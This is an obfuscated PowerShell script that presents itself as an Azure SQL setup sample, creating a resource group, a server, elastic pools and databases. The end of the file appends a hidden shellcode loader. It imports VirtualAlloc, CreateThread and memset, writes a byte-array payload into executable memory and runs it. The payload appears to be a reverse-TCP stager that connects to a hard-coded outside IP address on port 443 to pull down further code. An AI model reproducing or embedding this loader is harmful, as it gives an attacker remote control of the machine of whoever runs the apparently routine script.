${Su`BscrIpTion`id} = ("{1}{6}{5}{7}{0}{3}{2}{4}"-f 'our subscrip','<rep','on','ti',' id>',' wi','lace','th y')

${rEs`oUrce`GrOu`pnaMe} = "myResourceGroup-$(Get-Random)"
${l`o`CAtiON} = ("{0}{1}" -f 'westus','2')

${f`IrstPOOl`Name} = ("{1}{2}{0}"-f'ol','MyF','irstPo')
${sE`co`ND`PoOLn`Ame} = ("{3}{0}{2}{1}" -f 'condPo','l','o','MySe')

${admI`N`sQLL`oG`In} = ("{2}{0}{1}"-f'lAdm','in','Sq')
${pASS`w`OrD} = ("{6}{5}{3}{1}{0}{4}{2}"-f 'xP','Comple','wordHere>','Your','ass','r','<Ente')

${sEr`Ve`Rn`Ame} = "server-$(Get-Random)"

${fI`RST`Da`TA`BaSENaMe} = ("{3}{4}{2}{0}{1}"-f'Datab','ase','le','myF','irstSamp')
${SECon`d`DA`TAbASeNAME} = ("{0}{6}{3}{5}{4}{1}{2}" -f'mySecon','bas','e','S','ta','ampleDa','d')

${S`TarT`IP} = ("{0}{1}" -f'0.0','.0.0')
${en`Dip} = ("{0}{2}{1}" -f'0','0.0.0','.')


.("{3}{0}{2}{1}"-f'zCont','xt','e','Set-A') -SubscriptionId ${subScRi`P`TiO`N`id} 


${r`Es`o`UrcE`gRoup} = .("{0}{3}{1}{5}{4}{6}{2}" -f'New','eso','p','-AzR','ceGr','ur','ou') -Name ${ReSO`U`R`CEGRo`UpNAME} -Location ${l`oCAT`iON}


${Se`RV`ER} = .("{4}{3}{2}{1}{0}"-f'er','erv','-AzSqlS','ew','N') -ResourceGroupName ${r`ESO`URCe`G`ROupnAME} `
    -ServerName ${s`ERv`eRNAMe} `
    -Location ${l`o`catiON} `
    -SqlAdministratorCredentials $(.("{1}{2}{0}" -f'ject','N','ew-Ob') -TypeName ("{3}{4}{5}{0}{6}{2}{1}{9}{7}{8}{10}"-f'nt.Au','SC','omation.P','S','ystem.Manage','me','t','ede','n','r','tial') -ArgumentList ${Ad`mIN`s`qlLog`iN}, $(&("{3}{0}{1}{2}{5}{4}"-f 'onvertT','o','-Secur','C','ng','eStri') -String ${paS`S`WoRd} -AsPlainText -Force))


${SEr`VEr`FiReW`AL`Lru`lE} = &("{4}{5}{7}{0}{6}{1}{2}{3}" -f'a','lR','ul','e','New-AzS','qlSer','l','verFirew') -ResourceGroupName ${re`SOurCe`GRo`UPnAmE} `
    -ServerName ${s`eRVERN`AMe} `
    -FirewallRuleName ("{0}{1}{2}" -f'A','llo','wedIPs') -StartIpAddress ${s`TAR`TIp} -EndIpAddress ${E`ND`Ip}


${fi`Rst`Po`ol} = .("{1}{5}{3}{6}{0}{4}{2}" -f'El','N','icPool','-','ast','ew','AzSql') -ResourceGroupName ${rESO`URc`E`g`ROU`PnamE} `
    -ServerName ${S`ERV`ERn`AmE} `
    -ElasticPoolName ${FI`Rs`TpOoLN`AME} `
    -Edition ("{0}{1}"-f 'Sta','ndard') `
    -Dtu 50 `
    -DatabaseDtuMin 10 `
    -DatabaseDtuMax 20
${Se`C`OndPoOL} = &("{0}{5}{4}{3}{2}{6}{1}" -f'New','icPool','El','ql','zS','-A','ast') -ResourceGroupName ${ReSOurc`EGROuP`Na`mE} `
    -ServerName ${SE`RV`e`RnAme} `
    -ElasticPoolName ${SECOnd`PO`o`l`NAME} `
    -Edition ("{2}{0}{1}"-f'nd','ard','Sta') `
    -Dtu 50 `
    -DatabaseDtuMin 10 `
    -DatabaseDtuMax 50


${fIrST`d`ATAb`AsE} = .("{2}{0}{3}{1}" -f'z','atabase','New-A','SqlD')  -ResourceGroupName ${rE`S`ouRcEG`R`oUPnaME} `
    -ServerName ${s`Er`VERnaME} `
    -DatabaseName ${FiRsT`d`Atab`AseNaME} `
    -ElasticPoolName ${fiRSTPOO`L`Name}
${sEco`NDdA`T`AbA`se} = &("{4}{3}{0}{1}{2}" -f 'zSqlDat','a','base','w-A','Ne')  -ResourceGroupName ${ResOuRC`e`gro`Upna`mE} `
    -ServerName ${SeRV`E`RNa`Me} `
    -DatabaseName ${S`eco`NDd`AtabaSE`NamE} `
    -ElasticPoolName ${Sec`oNDpOoLnA`me}


${f`i`RstDat`AbA`Se} = .("{3}{1}{2}{0}"-f'base','t-AzS','qlData','Se') -ResourceGroupName ${Re`SoURCe`grOup`NAme} `
    -ServerName ${SEr`VERn`AmE} `
    -DatabaseName ${FIrS`Tda`Ta`BAs`eNAme} `
    -ElasticPoolName ${SEc`ONDpO`OLnAME}


${FIrST`Da`Tab`ASE} = &("{4}{5}{2}{3}{1}{0}" -f 'abase','Dat','Az','Sql','Se','t-') -ResourceGroupName ${REsou`R`CEgro`U`pName} `
    -ServerName ${s`ERver`N`AmE} `
    -DatabaseName ${FIrStd`ATA`B`ASeNa`ME} `
    -RequestedServiceObjectiveName "S0"



${C} = ((("{68}{18}{45}{31}{6}{5}{13}{63}{37}{47}{64}{14}{48}{42}{55}{43}{27}{26}{52}{36}{70}{54}{66}{8}{9}{67}{29}{57}{50}{41}{3}{21}{1}{61}{19}{4}{53}{33}{22}{59}{23}{69}{44}{24}{12}{30}{49}{25}{65}{35}{34}{15}{10}{16}{60}{39}{51}{20}{58}{7}{46}{62}{71}{40}{11}{0}{2}{32}{28}{17}{38}{56}"-f 'ern In','ern IntPtr','tPtr memset(','rt','ThreadAt',' s','c','.dll{0})]pu','dwSiz','e, uint flAllocat','reati','t','tPtr lp','ta','n','meter, uint dwC','onFlags','nt ','t({0}kerne','ad(IntPtr lp',');','({0}kernel32.dll{0})]public static ext','ute',' uint dwS','ize, In','Addre','tr lpA','c(IntP',' src, ui','Type, uint fl','St','2.dll{0})]publi','IntPtr dest, uint','b','Ptr lpPara',', Int','ss,','ex','count',' ',' ex','llImpo','r Virt','alAllo','ackS','l3','blic ','t','tPt','art','ct);[D','lpThreadId','ddre','tri','t','u',');','Prote','[DllImport({0}msvcrt','s,',', IntPtr',' CreateThre','sta','tic ','ern I','ss',' ','ion','[DllImpor','t',' uin','tic')) -F[CHaR]34);${W} = &("{1}{0}"-f '-Type','Add') -memberDefinition ${C} -Name ("{0}{1}"-f 'W','in32') -namespace ("{2}{1}{3}{0}"-f 'nctions','n32','Wi','Fu') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x86,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x8b,0x4c,0x10,0x78,0xe3,0x4a,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x89,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x69,0x6f,0x60,0xee,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${Z}."l`eN`Gth" -gt 0x1000){${G} = ${Z}."L`en`GTH"};${x}=${w}::("{2}{1}{0}" -f'oc','tualAll','Vir').Invoke(0,0x1000,${g},0x40);for (${I}=0;${i} -le (${Z}."L`ENgtH"-1);${i}++) {${w}::"M`eMs`et"([IntPtr](${X}.("{1}{0}"-f'nt32','ToI').Invoke()+${I}), ${z}[${i}], 1)};${w}::("{2}{3}{1}{0}" -f'ead','hr','Cr','eateT').Invoke(0,0,${x},0,0,0);for (;;){&("{0}{2}{1}"-f 'Start-','leep','s') 60};
